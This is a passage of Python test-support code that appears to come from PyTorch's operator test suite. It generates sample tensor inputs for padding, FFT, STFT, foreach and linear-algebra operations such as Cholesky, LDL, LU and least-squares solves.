3),)) def sample_inputs_squeeze(op_info, device, dtype, requires_grad, **kwargs): shapes_and_args = ( ((S, 1, S, 1), ()), ((1, 1, 1, 1), ()), ((S, 1, S, 1), (1,)), ((S, 1, S, 1), (-1,)), ((S, 1, S, 1), (2,)), ((S, 1, S, 1), (-2,)), ((), (0, )), ) for shape, args in shapes_and_args: tensor = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) yield SampleInput(tensor, args=args) def sample_inputs_nn_pad(op_info, device, dtype, requires_grad, mode, **kwargs): assert mode in ('constant', 'reflect', 'replicate', 'circular') if mode in ['reflect', 'replicate']: cases: tuple = ( # ignore ((1, 3), (1, 2)), ((1, 3), (0, 1)), ((0, 3, 3), (1, 2)), ((0, 3, 3), (0, 1)), ((1, 3, 3), (1, 2)), ((1, 3, 3), (0, 1)), ((1, 3, 3), (0, 2, 0, 1)), ((0, 3, 3, 3), (0, 2, 0, 1)), ((3, 3, 5, 5), (0, 2, 0, 1)), ((3, 3, 5, 5), (1, 1, 1, 1, 1, 1)), ((1, 3, 3, 3, 3), (1, 1, 1, 1, 1, 1)), ((1, 3, 4, 4), (-1, 1, -2, 1)), ) elif mode == 'constant': cases = ( ((1, 3), (1, 2)), ((1, 3), (0, 1)), ((1, 3), (0, 2, 0, 1)), ((0, 3, 3), (1, 2)), ((0, 3, 3), (0, 1)), ((0, 3, 3), (0, 2, 0, 1)), ((0, 3, 3), (1, 1, 1, 1, 1, 1)), ((1, 3, 3), (1, 2)), ((1, 3, 3), (0, 1)), ((1, 3, 3), (0, 2, 0, 1)), ((1, 3, 3), (1, 1, 1, 1, 1, 1)), ((0, 3, 3, 3), (1, 2)), ((0, 3, 3, 3), (0, 1)), ((0, 3, 3, 3), (0, 2, 0, 1)), ((0, 3, 3, 3), (1, 1, 1, 1, 1, 1)), ((3, 3, 5, 5), (1, 2)), ((3, 3, 5, 5), (0, 1)), ((3, 3, 5, 5), (0, 2, 0, 1)), ((3, 3, 5, 5), (1, 1, 1, 1, 1, 1)), ((1, 3, 3, 3, 3), (1, 2)), ((1, 3, 3, 3, 3), (0, 1)), ((1, 3, 3, 3, 3), (0, 2, 0, 1)), ((1, 3, 3, 3, 3), (1, 1, 1, 1, 1, 1)), ((1, 3, 4, 4), (-1, 1, -2, 1)), ) else: # mode == 'circular' if dtype == torch.bool: # test_dtypes fails on ASAN with for the case ab # runtime error: load of value 190, which is not a valid value for type 'bool' # Reference: https://github.com/pytorch/pytorch/pull/62814#issuecomment-894156562 # Reference Issue: https://github.com/pytorch/pytorch/issues/63034 cases = ( ((2, 3, 3), (1, 2)), ((1, 3, 3), (1, 2)), ) else: cases = ( ((0, 3, 3), (1, 2)), ((0, 3, 3), (0, 1)), ((1, 3, 3), (1, 2)), ((1, 3, 3), (0, 1)), ((0, 3, 3, 3), (0, 2, 0, 1)), ((3, 3, 5, 5), (0, 2, 0, 1)), ((1, 3, 3, 3, 3), (1, 1, 1, 1, 1, 1)), ((1, 3, 4, 4), (-1, 1, -2, 1)), ) make_inp = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) if mode == 'constant': # Default args yield SampleInput(make_inp((1, 3, 3)), args=((2, 2),)) if mode in ['reflect', 'replicate', 'circular']: for shape, pad in cases: yield SampleInput(make_inp(shape), args=(pad, mode)) else: # mode == 'constant' for pad_value in (1., 2.): for shape, pad in cases: yield SampleInput(make_inp(shape), args=(pad, mode, pad_value)) # TODO: reconcile with torch.linalg.det and torch.linalg.slogdet # Creates matrices with a positive nonzero determinant def sample_inputs_logdet(op_info, device, dtype, requires_grad, **kwargs): def make_nonzero_det(A, *, sign=1, min_singular_value=0.1, **kwargs): u, s, vh = torch.linalg.svd(A, full_matrices=False) s.clamp_(min=min_singular_value) A = (u * s.unsqueeze(-2)) @ vh det = A.det() if sign is not None: if A.dim() == 2: if (det < 0) ^ (sign < 0): A[0, :].neg_() else: cond = ((det < 0) ^ (sign < 0)).nonzero() if cond.size(0) > 0: for i in range(cond.size(0)): A[list(cond[i])][0, :].neg_() return A # cases constructed using make_tensor() tensor_shapes = ( (S, S), (1, 1), (3, 3, S, S), (3, 3, 1, 1) ) for shape in tensor_shapes: t = make_tensor(shape, device=device, dtype=dtype) d = make_nonzero_det(t).requires_grad_(requires_grad) yield SampleInput(d) # cases constructed using: # 1) make_symmetric_matrices # 2) make_symmetric_pd_matrices # 3) make_fullrank_matrices_with_distinct_singular_values symmetric_shapes = ( (S, S), (3, S, S), ) def _helper(constructor, *shape, **kwargs): t = constructor(*shape, device=device, dtype=dtype) d = make_nonzero_det(t, **kwargs).requires_grad_(requires_grad) yield SampleInput(d) for shape in symmetric_shapes: _helper(make_symmetric_matrices, *shape) _helper(make_symmetric_pd_matrices, *shape) _helper(make_fullrank_matrices_with_distinct_singular_values, *shape, min_singular_value=0) def np_unary_ufunc_integer_promotion_wrapper(fn): # Wrapper that passes PyTorch's default scalar # type as an argument to the wrapped NumPy # unary ufunc when given an integer input. # This mimicks PyTorch's integer->floating point # type promotion. # # This is necessary when NumPy promotes # integer types to double, since PyTorch promotes # integer types to the default scalar type. # Helper to determine if promotion is needed def is_integral(dtype): return dtype in [np.bool_, bool, np.uint8, np.int8, np.int16, np.int32, np.int64] @wraps(fn) def wrapped_fn(x): # As the default dtype can change, acquire it when function is called. # NOTE: Promotion in PyTorch is from integer types to the default dtype np_dtype = torch_to_numpy_dtype_dict[torch.get_default_dtype()] if is_integral(x.dtype): return fn(x.astype(np_dtype)) return fn(x) return wrapped_fn def sample_inputs_spectral_ops(self, device, dtype, requires_grad=False, **kwargs): is_fp16_or_chalf = dtype == torch.complex32 or dtype == torch.half if not is_fp16_or_chalf: nd_tensor = partial(make_tensor, (S, S + 1, S + 2), device=device, dtype=dtype, requires_grad=requires_grad) oned_tensor = partial(make_tensor, (31,), device=device, dtype=dtype, requires_grad=requires_grad) else: # cuFFT supports powers of 2 for half and complex half precision # NOTE: For hfft, hfft2, hfftn, irfft, irfft2, irfftn with default args # where output_size n=2*(input_size - 1), we make sure that logical fft size is a power of two if self.name in ['fft.hfft', 'fft.irfft']: shapes = ((2, 9, 9), (33,)) elif self.name in ['fft.hfft2', 'fft.irfft2']: shapes = ((2, 8, 9), (33,)) elif self.name in ['fft.hfftn', 'fft.irfftn']: shapes = ((2, 2, 33), (33,)) else: shapes = ((2, 8, 16), (32,)) nd_tensor = partial(make_tensor, shapes[0], device=device, dtype=dtype, requires_grad=requires_grad) oned_tensor = partial(make_tensor, shapes[1], device=device, dtype=dtype, requires_grad=requires_grad) if self.ndimensional == SpectralFuncType.ND: return [ SampleInput(nd_tensor(), kwargs=dict(s=(3, 10) if not is_fp16_or_chalf else (4, 8), dim=(1, 2), norm='ortho')), SampleInput(nd_tensor(), kwargs=dict(norm='ortho')), SampleInput(nd_tensor(), kwargs=dict(s=(8,))), SampleInput(oned_tensor()), *(SampleInput(nd_tensor(), kwargs=dict(dim=dim)) for dim in [-1, -2, -3, (0, -1)]), ] elif self.ndimensional == SpectralFuncType.TwoD: return [ SampleInput(nd_tensor(), kwargs=dict(s=(3, 10) if not is_fp16_or_chalf else (4, 8), dim=(1, 2), norm='ortho')), SampleInput(nd_tensor(), kwargs=dict(norm='ortho')), SampleInput(nd_tensor(), kwargs=dict(s=(6, 8) if not is_fp16_or_chalf else (4, 8))), SampleInput(nd_tensor(), kwargs=dict(dim=0)), SampleInput(nd_tensor(), kwargs=dict(dim=(0, -1))), SampleInput(nd_tensor(), kwargs=dict(dim=(-3, -2, -1))), ] else: return [ SampleInput(nd_tensor(), kwargs=dict(n=10 if not is_fp16_or_chalf else 8, dim=1, norm='ortho')), SampleInput(nd_tensor(), kwargs=dict(norm='ortho')), SampleInput(nd_tensor(), kwargs=dict(n=7 if not is_fp16_or_chalf else 8) ), SampleInput(oned_tensor()), *(SampleInput(nd_tensor(), kwargs=dict(dim=dim)) for dim in [-1, -2, -3]), ] def sample_inputs_repeat_interleave(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return [ SampleInput(make_input(()), kwargs=dict(repeats=2)), SampleInput(make_input((2, 3, 4)), kwargs=dict(repeats=2)), SampleInput(make_input((2, 3, 4)), kwargs=dict(repeats=2, dim=1)), SampleInput(make_input((2, 3, 4)), kwargs=dict(repeats=torch.arange(3, device=device), dim=1)) ] SpectralFuncType = Enum('SpectralFuncType', ('OneD', 'TwoD', 'ND')) # Metadata class for Fast Fourier Transforms in torch.fft. class SpectralFuncInfo(OpInfo): """Operator information for torch.fft transforms. """ def __init__(self, name, # the string name of the function *, ref=None, # Reference implementation (probably in np.fft namespace) dtypes=floating_and_complex_types(), ndimensional: SpectralFuncType, sample_inputs_func=sample_inputs_spectral_ops, decorators=None, **kwargs): decorators = list(decorators) if decorators is not None else [] decorators += [ skipCPUIfNoFFT, DecorateInfo(toleranceOverride({torch.chalf: tol(4e-2, 4e-2)}), "TestCommon", "test_complex_half_reference_testing") ] super().__init__(name=name, dtypes=dtypes, decorators=decorators, sample_inputs_func=sample_inputs_func, **kwargs) self.ref = ref self.ndimensional = ndimensional def sample_inputs_stft(op_info, device, dtype, requires_grad, **kwargs): def mt(shape, **kwargs): return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs) yield SampleInput(mt(100), kwargs=dict(n_fft=10)) for center in [False, True]: yield SampleInput(mt(10), kwargs=dict(n_fft=7, center=center)) yield SampleInput(mt((10, 100)), kwargs=dict(n_fft=16, hop_length=4, center=center)) window = make_tensor(16, low=.5, high=2.0, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput( mt((2, 100)), kwargs=dict(n_fft=16, window=window, return_complex=True, center=center)) yield SampleInput( mt((3, 100)), kwargs=dict(n_fft=16, window=window, return_complex=True, center=center)) if not dtype.is_complex: yield SampleInput( mt((10, 100)), kwargs=dict(n_fft=16, window=window, onesided=False)) def sample_inputs_istft(op_info, device, dtype, requires_grad, **kwargs): def mt(shape, **kwargs): real_shape = shape if dtype.is_complex else shape + (2,) return make_tensor(real_shape, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs) yield SampleInput(mt((10, 2)), kwargs=dict(n_fft=10)) yield SampleInput(mt((6, 3)), kwargs=dict(n_fft=6, onesided=False)) yield SampleInput(mt((6, 4)), kwargs=dict(n_fft=10, onesided=True)) for center in [False, True]: yield SampleInput(mt((10, 10, 6)), kwargs=dict(n_fft=10, center=center)) yield SampleInput(mt((1, 9, 10)), kwargs=dict(n_fft=16, hop_length=4, center=center)) window = make_tensor(10, low=.5, high=2.0, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(mt((10, 10, 6)), kwargs=dict( n_fft=10, window=window, center=center, return_complex=dtype.is_complex)) yield SampleInput(mt((10, 10, 10)), kwargs=dict( n_fft=10, window=window[:8], win_length=8, center=center, return_complex=True)) real_window = window if not dtype.is_complex else window.real yield SampleInput(mt((10, 5, 6)), kwargs=dict(n_fft=8, window=real_window[:8], center=center)) def sample_inputs_fftshift(op_info, device, dtype, requires_grad, **kwargs): def mt(shape, **kwargs): return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs) yield SampleInput(mt((9, 10))) yield SampleInput(mt((50,)), kwargs=dict(dim=0)) yield SampleInput(mt((5, 11)), kwargs=dict(dim=(1,))) yield SampleInput(mt((5, 6)), kwargs=dict(dim=(0, 1))) yield SampleInput(mt((5, 6, 2)), kwargs=dict(dim=(0, 2))) class ShapeFuncInfo(OpInfo): """Early version of a specialized OpInfo for Shape manipulating operations like tile and roll""" def __init__(self, name, # the string name of the function *, ref, # a reference function dtypes=floating_types(), dtypesIfCUDA=None, dtypesIfROCM=None, sample_inputs_func=None, **kwargs): super(ShapeFuncInfo, self).__init__(name, dtypes=dtypes, dtypesIfCUDA=dtypesIfCUDA, dtypesIfROCM=dtypesIfROCM, sample_inputs_func=sample_inputs_func, **kwargs) self.ref = ref def sample_inputs_foreach(self, device, dtype, N, *, noncontiguous=False, same_size=False, low=None, high=None): if same_size: return [make_tensor((N, N), dtype=dtype, device=device, noncontiguous=noncontiguous) for _ in range(N)] else: return [make_tensor((N - i, N - i), dtype=dtype, device=device, noncontiguous=noncontiguous) for i in range(N)] def get_foreach_method_names(name): # get torch inplace reference function op_name = "_foreach_" + name inplace_op_name = "_foreach_" + name + "_" op = getattr(torch, op_name, None) inplace_op = getattr(torch, inplace_op_name, None) ref = getattr(torch, name, None) ref_inplace = getattr(torch.Tensor, name + "_", None) return op, inplace_op, ref, ref_inplace class ForeachFuncInfo(OpInfo): """Early version of a specialized OpInfo for foreach functions""" def __init__(self, name, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half), dtypesIfROCM=None, supports_alpha_param=False, sample_inputs_func=sample_inputs_foreach, **kwargs): super().__init__( "_foreach_" + name, dtypes=dtypes, dtypesIfCUDA=dtypesIfCUDA, dtypesIfROCM=dtypesIfROCM, sample_inputs_func=sample_inputs_func, **kwargs ) foreach_method, foreach_method_inplace, torch_ref_method, torch_ref_inplace = get_foreach_method_names(name) self.method_variant = foreach_method self.inplace_variant = foreach_method_inplace self.ref = torch_ref_method self.ref_inplace = torch_ref_inplace self.supports_alpha_param = supports_alpha_param if name == "norm": self.ref = torch.linalg.vector_norm def sample_inputs_linalg_cholesky_inverse(op_info, device, dtype, requires_grad=False, **kwargs): from torch.testing._internal.common_utils import random_well_conditioned_matrix # Cholesky factorization is for positive-definite matrices single_well_conditioned_matrix = random_well_conditioned_matrix(S, S, dtype=dtype, device=device) batch_well_conditioned_matrices = random_well_conditioned_matrix(2, S, S, dtype=dtype, device=device) single_pd = single_well_conditioned_matrix @ single_well_conditioned_matrix.mH batch_pd = batch_well_conditioned_matrices @ batch_well_conditioned_matrices.mH inputs = ( torch.zeros(0, 0, dtype=dtype, device=device), # 0x0 matrix torch.zeros(0, 2, 2, dtype=dtype, device=device), # zero batch of matrices single_pd, batch_pd ) test_cases = (torch.linalg.cholesky(a, upper=False) for a in inputs) for l in test_cases: # generated lower-triangular samples l.requires_grad = requires_grad yield SampleInput(l) # upper=False by default yield SampleInput(l.detach().clone().requires_grad_(requires_grad), kwargs=dict(upper=False)) # generate upper-triangular inputs u = l.detach().clone().mT.contiguous().requires_grad_(requires_grad) yield SampleInput(u, kwargs=dict(upper=True)) def sample_inputs_linalg_ldl_factor(op_info, device, dtype, requires_grad=False, **kwargs): from torch.testing._internal.common_utils import ( random_hermitian_pd_matrix, random_symmetric_pd_matrix, ) device = torch.device(device) # Symmetric inputs yield SampleInput( random_symmetric_pd_matrix(S, dtype=dtype, device=device), kwargs=dict(hermitian=False), ) # single matrix yield SampleInput( random_symmetric_pd_matrix(S, 2, dtype=dtype, device=device), kwargs=dict(hermitian=False), ) # batch of matrices yield SampleInput( torch.zeros(0, 0, dtype=dtype, device=device), kwargs=dict(hermitian=False) ) # 0x0 matrix yield SampleInput( torch.zeros(0, 2, 2, dtype=dtype, device=device), kwargs=dict(hermitian=False) ) # zero batch of matrices # Hermitian inputs # hermitian=True for complex inputs on CUDA is supported only with MAGMA 2.5.4+ magma_254_available = device.type == 'cuda' and _get_magma_version() >= (2, 5, 4) if dtype.is_complex and (device.type == 'cpu' or magma_254_available): yield SampleInput( random_hermitian_pd_matrix(S, dtype=dtype, device=device), kwargs=dict(hermitian=True), ) # single matrix yield SampleInput( random_hermitian_pd_matrix(S, 2, dtype=dtype, device=device), kwargs=dict(hermitian=True), ) # batch of matrices def sample_inputs_linalg_ldl_solve(op_info, device, dtype, requires_grad=False, **kwargs): # Generate LDL factors of symmetric (and Hermitian on CPU) matrices from torch.testing._internal.common_utils import random_hermitian_pd_matrix, random_symmetric_pd_matrix device = torch.device(device) symmetric_inputs = ( random_symmetric_pd_matrix(S, dtype=dtype, device=device), # single matrix random_symmetric_pd_matrix(S, 2, dtype=dtype, device=device), # batch of matrices torch.zeros(0, 0, dtype=dtype, device=device), # 0x0 matrix torch.zeros(0, 2, 2, dtype=dtype, device=device), # zero batch of matrices ) hermitian_inputs = ( random_hermitian_pd_matrix(S, dtype=dtype, device=device), random_hermitian_pd_matrix(S, 2, dtype=dtype, device=device), ) if device.type == 'cpu' and dtype.is_complex else () test_cases1 = (torch.linalg.ldl_factor_ex(a, hermitian=False) for a in symmetric_inputs) test_cases2 = (torch.linalg.ldl_factor_ex(a, hermitian=True) for a in hermitian_inputs) # Symmetric case for test_case in test_cases1: factors, pivots, _ = test_case factors.requires_grad = requires_grad for B_batch_shape in ((), factors.shape[:-2]): B = make_tensor((*B_batch_shape, factors.shape[-1], S), device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(factors, args=(pivots, B), kwargs=dict(hermitian=False)) clone_factors = factors.detach().clone().requires_grad_(requires_grad) yield SampleInput(clone_factors, args=(pivots, B), kwargs=dict(hermitian=False)) # Hermitian case for test_case in test_cases2: factors, pivots, _ = test_case factors.requires_grad = requires_grad for B_batch_shape in ((), factors.shape[:-2]): B = make_tensor((*B_batch_shape, factors.shape[-1], S), device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(factors, args=(pivots, B), kwargs=dict(hermitian=True)) clone_factors = factors.detach().clone().requires_grad_(requires_grad) yield SampleInput(clone_factors, args=(pivots, B), kwargs=dict(hermitian=True)) def sample_inputs_linalg_lstsq(op_info, device, dtype, requires_grad=False, **kwargs): from torch.testing._internal.common_utils import random_well_conditioned_matrix device = torch.device(device) drivers: Tuple[str, ...] if device.type == 'cuda': drivers = ('gels',) else: drivers = ('gels', 'gelsy', 'gelss', 'gelsd') # we generate matrices of shape (..., n + delta, n) deltas: Tuple[int, ...] if device.type == 'cpu' or has_cusolver(): deltas = (-1, 0, +1) # only square systems if Cusolver is not available # becase we solve a lstsq problem with a transposed matrix in the backward else: deltas = (0,) out = [] for batch, driver, delta in product(((), (3,), (3, 3)), drivers, deltas): shape = batch + (3 + delta, 3) a = random_well_conditioned_matrix(*shape, dtype=dtype, device=device) a.requires_grad_(requires_grad) b = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) out.append(SampleInput(a, args=(b,), kwargs=dict(driver=driver))) return out def sample_inputs_householder_product(op_info, device, dtype, requires_grad, **kwargs): """ This function generates input for torch.linalg.householder_product (torch.orgqr). The first argument should be a square matrix or batch of square matrices, the second argument is a vector or batch of vectors. Empty, square, rectangular, batched square and batched rectangular input is generated. """ # Each column of the matrix is getting multiplied many times leading to very large values for # the Jacobian matrix entries and making the finite-difference result of grad check less accurate. # That's why gradcheck with the default range [-9, 9] fails and [-2, 2] is used here. samples = ( SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)), SampleInput(make_tensor((S + 1, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)), SampleInput(make_tensor((2, 1, S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((2, 1, S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)), SampleInput(make_tensor((2, 1, S + 1, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((2, 1, S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)), SampleInput(make_tensor((0, 0), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(make_tensor((0,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)), SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((0,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)), # m = n = S, k = S - 2 SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((S - 2,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)), # m = S, n = S -1, k = S - 2 SampleInput(make_tensor((S, S - 1), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((S - 2,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)), ) return samples def sample_inputs_ormqr(op_info, device, dtype, requires_grad, **kwargs): # create a helper function wrapping `make_tensor` make_input = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) def gen_inputs(): batches = [(), (0, ), (2, ), (2, 1)] ns = [5, 2, 0] tf = [True, False] for batch, (m, n), left, transpose in product(batches, product(ns, ns), tf, tf): reflectors = make_input((*batch, m, n)) tau = make_input((*batch, min(m, n))) other_matrix_shape = (m, n) if left else (n, m) other = make_input((*batch, *other_matrix_shape)) kwargs = {"left": left, "transpose": transpose} yield SampleInput(reflectors, args=(tau, other,), kwargs=kwargs) return tuple(gen_inputs()) def sample_inputs_linalg_cholesky(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates always positive-definite input for torch.linalg.cholesky using random_hermitian_pd_matrix. The input is generated as the itertools.product of 'batches' and 'ns'. In total this function generates 8 SampleInputs 'batches' cases include: () - single input, (0,) - zero batched dimension, (2,) - batch of two matrices, (1, 1) - 1x1 batch of matrices 'ns' gives 0x0 and 5x5 matrices. Zeros in dimensions are edge cases in the implementation and important to test for in order to avoid unexpected crashes. """ from torch.testing._internal.common_utils import random_hermitian_pd_matrix batches = [(), (0, ), (2, ), (1, 1)] ns = [5, 0] out = [] for batch, n, upper in product(batches, ns, [True, False]): a = random_hermitian_pd_matrix(n, *batch, dtype=dtype, device=device) a.requires_grad = requires_grad out.append(SampleInput(a, kwargs={"upper": upper})) return out def sample_inputs_symeig(op_info, device, dtype, requires_grad=False, **kwargs): out = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad) for o in out: o.kwargs = {"upper": bool(np.random.choice([True, False])), "eigenvectors": True} # A gauge-invariant function o.output_process_fn_grad = lambda output: (output[0], abs(output[1])) yield o def sample_inputs_linalg_eig(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.eig """ def out_fn(output): return output[0], abs(output[1]) samples = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad) for sample in samples: sample.output_process_fn_grad = out_fn yield sample def sample_inputs_linalg_eigh(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.eigh/eigvalsh with UPLO="U" or "L" keyword argument. """ def out_fn(output): if isinstance(output, tuple): # eigh function return output[0], abs(output[1]) else: # eigvalsh function return output # Samples do not need to be Hermitian, as we're using gradcheck_wrapper_hermitian_input samples = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad) for sample in samples: sample.kwargs = {"UPLO": np.random.choice(["L", "U"])} sample.output_process_fn_grad = out_fn yield sample def sample_inputs_linalg_slogdet(op_info, device, dtype, requires_grad=False, **kwargs): def out_fn(output): return output[1] samples = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad) for sample in samples: sample.output_process_fn_grad = out_fn yield sample def sample_inputs_linalg_pinv(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.pinv with hermitian=False keyword argument. """ for o in sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad, **kwargs): real_dtype = o.input.real.dtype if dtype.is_complex else dtype # requires_grad path for rtol tensor is not implemented for rtol in (None, 1.0, torch.tensor(1.0, dtype=real_dtype, device=device)): o = clone_sample(o) o.kwargs = {"rtol": rtol} yield o def sample_inputs_linalg_pinv_hermitian(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.pinv with hermitian=True keyword argument. """ for o in sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad, **kwargs): o.kwargs = {"hermitian": True} yield o def sample_inputs_linalg_solve(op_info, device, dtype, requires_grad=False, vector_rhs_allowed=True, **kwargs): """ This function generates always solvable input for torch.linalg.solve We sample a fullrank square matrix (i.e. invertible) A The first input to torch.linalg.solve is generated as the itertools.product of 'batches' and 'ns'. The second input is generated as the product of 'batches', 'ns' and 'nrhs'. In total this function generates 18 SampleInputs 'batches' cases include: () - single input, (0,) - zero batched dimension, (2,) - batch of two matrices. 'ns' gives 0x0 and 5x5 matrices. and 'nrhs' controls the number of vectors to solve for: () - using 1 as the number of vectors implicitly (1,) - same as () but explicit (3,) - solve for 3 vectors. Zeros in dimensions are edge cases in the implementation and important to test for in order to avoid unexpected crashes. 'vector_rhs_allowed' controls whether to include nrhs = () to the list of SampleInputs. torch.solve / triangular_solve / cholesky_solve (opposed to torch.linalg.solve) do not allow 1D tensors (vectors) as the right-hand-side. Once torch.solve / triangular_solve / cholesky_solve and its testing are removed, 'vector_rhs_allowed' may be removed here as well. """ make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_a = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) make_b = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0, ), (2, )] ns = [5, 0] if vector_rhs_allowed: nrhs = [(), (1,), (3,)] else: nrhs = [(1,), (3,)] for n, batch, rhs in product(ns, batches, nrhs): yield SampleInput(make_a(*batch, n, n), args=(make_b((batch + (n,) + rhs)),)) def sample_inputs_linalg_solve_triangular(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) bs = (1, 2, 0) ns = (3, 0) ks = (1, 3, 0) for b, n, k, (left, upper, uni) in product(bs, ns, ks, product((True, False), repeat=3)): if b == 1: A = make_arg((n, n)) if left else make_arg((k, k)) B = make_arg((n, k)) else: A = make_arg((b, n, n)) if left else make_arg((b, k, k)) B = make_arg((b, n, k)) if uni: # Not really necessary, but writing it for consistency A.diagonal(0, -2, -1).fill_(1.) else: d = A.diagonal(0, -2, -1) d[d.abs() < 1e-6] = 1. if upper: A.triu_() else: A.tril_() kwargs = {"upper": upper, "left": left, "unitriangular": uni} if requires_grad: for grad_A, grad_B in product((True, False), repeat=2): # Either A or B needs to have a gradient if not grad_A and not grad_B: continue yield SampleInput( A.clone().requires_grad_(grad_A), args=(B.clone().requires_grad_(grad_B),), kwargs=kwargs) else: yield SampleInput(A, args=(B,), kwargs=kwargs) def sample_inputs_legacy_solve(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates always solvable input for legacy solve functions (the ones that are not in torch.linalg module). The difference from sample_inputs_linalg_solve is that here the right-hand-side of A x = b equation should have b.ndim >= 2, vectors are not allowed. Also the arguments order is swapped. """ out = sample_inputs_linalg_solve( op_info, device, dtype, requires_grad=requires_grad, vector_rhs_allowed=False ) # Reverses tensor order for sample in out: sample.input, sample.args = sample.args[0], (sample.input,) yield sample def sample_inputs_cholesky_solve(op_info, device, dtype, requires_grad=False, **kwargs): cholesky_inverse_samples = sample_inputs_linalg_cholesky_inverse( op_info, device, dtype, requires_grad=False ) for sample in cholesky_inverse_samples: psd_matrix = sample.input sample.input = make_tensor(psd_matrix.shape, dtype=dtype, device=device, requires_grad=requires_grad, low=None, high=None) sample.args = (psd_matrix.requires_grad_(requires_grad),) yield sample def sample_inputs_lu(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_fullrank_matrices_with_distinct_singular_values, dtype=dtype, device=device, requires_grad=requires_grad) # not needed once OpInfo tests support Iterables batch_shapes = ((), (3,), (3, 3)) for batch_shape, get_infos, size_delta in product(batch_shapes, (True, False), (-2, -1, 0, +1, +2)): shape = batch_shape + (S + size_delta, S) input = make_arg(*shape) yield SampleInput(input, args=(True, get_infos)) def sample_inputs_linalg_lu(op_info, device, dtype, requires_grad=False, **kwargs): full_rank = (op_info.name == "linalg.lu_factor") make_fn = make_tensor if not full_rank else make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fn, dtype=dtype, device=device, requires_grad=requires_grad) def out_fn(output): if op_info.name in ("linalg.lu"): return output[1], output[2] else: return output batch_shapes = ((), (3,), (3, 3)) # pivot=False only supported in CUDA pivots = (True, False) if torch.device(device).type == "cuda" else (True,) deltas = (-2, -1, 0, +1, +2) for batch_shape, pivot, delta in product(batch_shapes, pivots, deltas): shape = batch_shape + (S + delta, S) # Insanely annoying that make_fullrank_blablabla accepts a *shape and not a tuple! A = make_arg(shape) if not full_rank else make_arg(*shape) yield SampleInput(A, kwargs={"pivot": pivot}, output_process_fn_grad=out_fn) def sample_inputs_lu_solve(op_info, device, dtype, requires_grad=False, **kwargs): make_fn = make_fullrank_matrices_with_distinct_singular_values make_a = partial(make_fn, dtype=dtype, device=device) make_b = partial(make_tensor, dtype=dtype, device=device) batches = ((), (0, ), (2, )) ns = (5, 3, 0) nrhs = (0, 1, 6) for n, batch, rhs in product(ns, batches, nrhs): shape_a = batch + (n, n) a = make_a(*shape_a) lu, pivs = a.lu() lu = lu.contiguous() shape_b = batch + (n, rhs) b = make_b(shape_b) grads = (False,) if not requires_grad else (True, False) # we try all possible combinations of requires_grad for each input for lu_grad, b_grad in product(grads, grads): # when requires_grad == True, at least one input has to have requires_grad enabled if requires_grad and not lu_grad and not b_grad: continue lu_ = lu.clone() lu_.requires_grad_(lu_grad) b_ = b.clone() b_.requires_grad_(b_grad) yield SampleInput(b_, args=(lu_, pivs)) def sample_inputs_lu_unpack(op_info, device, dtype, requires_grad=False, **kwargs): def out_fn(output): return output[1], output[2] for lu_sample in sample_inputs_linalg_lu(op_info, device, dtype, requires_grad, **kwargs): lu_data, pivots = torch.linalg.lu_factor(lu_sample.input) lu_data.requires_grad_(requires_grad) yield SampleInput(lu_data, args=(pivots,), output_process_fn_grad=out_fn) def sample_inputs_roll(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) args = ((0, 0), (1, 2), (0, 2), (2, 